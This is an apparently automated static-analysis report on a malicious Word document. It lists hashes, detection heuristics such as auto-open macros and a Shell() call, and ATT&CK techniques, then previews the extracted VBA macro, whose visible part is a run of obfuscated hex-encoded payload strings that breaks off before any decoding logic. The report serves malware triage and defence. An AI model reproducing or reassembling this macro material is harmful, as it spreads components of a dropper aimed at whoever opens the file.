Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 66ab81649eff2e2e…

MALICIOUS

Office (OLE)

135.0 KB Created: 2018-03-25 10:32:00 Authoring application: Microsoft Office Word First seen: 2018-04-12
MD5: 84be2c2b7bd52e881210cdc82727f224 SHA-1: fdbb86286e19a15199a57b8c726d05c864699b2f SHA-256: 66ab81649eff2e2e1c4a652b7b55060770ece7059562f76ed3268e97f5ed6be6
264 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains VBA macros, including a Document_Open and Workbook_Open macro, which are designed to execute automatically. A critical heuristic firing indicates a Shell() call within the VBA code, suggesting the execution of an external command or script. The presence of a long encoded blob within the macros further supports the likelihood of a downloader or dropper functionality, aiming to fetch and execute a secondary payload.

Heuristics 8

  • ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19305 bytes
SHA-256: 218d57d5e9e961af9f6e86370449035db2c9011c0e4bd42a0de6b8f06143bf2e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 72 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit


Public Sub IGT_MP()
   Dim KSP_Z As String
   Dim GYQ_I As String
   Dim I_FZQ As String
I_FZQ = "8AC2C88A8A808A8A8A9E8A8A8A998A8A8A7B8A548A8A8A8A5D8AC79A778A8A96508A90C1B490B18A7E8A4E8A8A8E8A7EBE8A8A8AA5838A8A8C8ABA6E8A8A8A6A8A8A8AC095988A72A5AC8A778A8A678A5C705E8A8A798A7F8A8A8D968A8A8A83B16C8A73A78"
Dim MLW_H As String
MLW_H = "A517D8A7D8A8A8A8A9EC58A8A8A59A78A608A60998A8AC3568A8A668AA98A8AAF588A8A8A6B8A4B8A8A8AAE8A8AC6A38A4E5E8A8A8AA1628A8A8A8A8A66A08A8A8A6AAC8A8A8A77AA55635F6D7DC38A8AA6C8528AA0B28A8C8A8AA061968AA38A9E8AC883AD"
Dim GP_AZO As String
GP_AZO = "B38A8AC9A3978A8AB7C37D588A8A8A8A8A8A926B548AA4605F9F8A8A8A908A8A8A8A8A54848A668A6EB96D548A8A8AC0B68A8A8DAA8A8AB38F8A896E8A7D828A7B8A8A8AC5BA8A8A7782578AAA8A8AA48A5F8A908A8AB08A6F8AC28A878AAD718A558A8AB68"
Dim SI_ZOA As String
SI_ZOA = "A8AC48AB8A6228AB68FA36E8A8A868AA58A8AA18A58AA8A978A6A848A8A8A8A638A64798AC08A578C8A8AC38A4B625F8A8A648A6B8AA99E8A8AAEC68AAD6C8AACA88A8A844C68578A8A99548A8A8AB78A8AA28A9B7992988A8A968A618A8A998A8895BD8A8A"
Dim IV_DYM As String
IV_DYM = "8A8A8A5A948A818A8AAD8A6CB88A8A8A8A8A8A85638A8A798A8A948A724E8A898A9D698A8A998AAFB78A8AB88A8A8A8AAE8AAA8AB78A665E9D8AB3AE698A965682C88A72958A8A508A8A8A8A8AC4768A988A8A8A8AC38A5E8A4F738A8AC48AC77C8A8A638A8"
Dim ESL_HG As String
ESL_HG = "A74B28AA5769E8A4E8A82C98AB87A9C8A5D8A9AC95A8A8A9F7FBA70B9B48AA18A8A9F8AC98A978A628A608A558A578A7691C3708A7AC58A8AA4708A788A8A4B8A8A8A63C78A4F8AAD8AB2978A8A9487AEC68D6DC07C8ABB8A7B8AAC8AC58A74605A5F4F8A78"
Dim JHQ_IQM As String
JHQ_IQM = "A38C8A8A6C8A788A5B8AA38A95C18A8A828A89968AC4748A788A6EC78A7F83BA998A8AB98A8A8A8A9FC6C3838A8A8A8AAA8A8A8AC38A8A8A8A8A55BF8A8A8AAEAB8A4C8C8A8A568A8A8A8AAF8ABC8AC8A38A8AB7BD638AC88A8A8A8A8A8A9AAF8A678A688C8"
Dim R_M As String
R_M = "A6D8A8A8A5DA28A968A8A8F8A8A788A8AC8868A8A658A8B8AA88A958A8A9FB4AB615B8A8A8A988A7063BE539499678A6CB88A97A3998A7D8A8AB774578A8A8F638AB88AACB37B8A8A8A8A8A8A8C63748A8A68528AB18A8A8A638A8A8A7CB58A8A578AB997BF"
Dim CRW_ZQ As String
CRW_ZQ = "8A958A92765B8A8A8A8A8A8AAD7AAC8A9A8A8A9D8A6F8A8B8A7B8A8A8F92A3999E8A67AB968AC37F8A7280818A548AA78A8A6A8A7D6C6D708A518A8A91C2C5918A8A9D8A5D4C8A8A8A9C8A8A8A8A8B8A738A667DC98A8A90678A8A5E8A8A4C8A8A948A738A8"
Dim EOR_SIU As String
EOR_SIU = "B8AA38A81989F5B7F508A8A6859BC6B8E67C78FC88AAD8A8A4B8A8A8A8A8A7CB38A9E858A8A8A818A57AF8AC28A8A8A8A8A78788A539EC98A8A81A08A89975AB48AC58A819198A6909FBB8AC5887479BD6A85B38A4F8A8A8A8A81A68A8A978A638A588EA18A"
Dim CW_JR As String
CW_JR = "A49A7E8A8A8A4FB0BB528A4E8A91AF8A8AC65B8A8AAF528ABA8A7A8A8A8A8A7F8A688A4D7F8A8A8A8A8A8A7F8A8A93C15A8A898C4C8A8A8AA6AE808A7A878A638A9B92518A8A8B5199B08A8A86598A8AAD8A8A8A8A8AB7588A9E8AAB9E8A548A8A8DAC8D8A8"
Dim R_AF As String
R_AF = "A658A868A6894666AA08A8A8A8AB78AA68A8A8ABA8A8A8A8A81728A8A70A68A598A8A8DC76E8A8A8ABD8A677C908A8A8A8AA38A8AC45D8AB38A8A8A4D8A568A4E637BC18A8ABC8A7EBE8A4F8A8A8ABB8A4D7D6CA06E8A4E5B8A9CBFAC8A8A718A8A8A7C8A8A"
Dim F_ZC As String
F_ZC = "848AAC8F8A585CC58A638A8AAF8AB38A78B18A8AA39D8A4C8AA672608A64948A8A915C4D8A8A8A934C8A6C87698A8CA18A5293878F59A08A7A8A9D8A76A88A664C8A689267AE8A8A785B9CB58A878D8A8A5D4B8ABE8A8A6B8A818A8B678A8A5186B98A8A85B"
Dim O_ZK As String
O_ZK = "25CC95A7F8A8A5C8AC35B8A8A8A8A65A188B4A08A8A8A908A8A8A8AB18AC58AA79A4C8A8A898A515A908ABE8A8A8A8A8A8A7CA98A898A9C846D8B5A6A82728A8A8A83A18A8A8ABD9A8A964D8AB2B68A4B8A678168C38A93C38A8A8A8A685E8A9A8A8A9D737D"
Dim H_M As String
H_M = "8A9F9D8A9AB28A8AAA69958A57C48A658A6C9B8D4C8AB360788A8A8A6753518AA4B67B8A8A8AAA8A738A8AC351AF8A7F8A8A4C8A7BAC8A88A9ABBD8A8AA1638A978A948A9A8A8ABA8A8A4D8A8A8A8A8A8A8B798ABE858A8A8A8A8AB98ABA7B8A8A77AF657C8"
Dim I_J As String
I_J = "A8A618AABA2A9968A8AC28A798A618A628AB1C58A8AAD8A4C8AB48A8A8AC08A4DB463515D8ABB8A8A8A8A8A658A8A9E8A8AA86FC09E8A8A8AA5536B8AB78A8A8A5B9954748AC785BF718
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.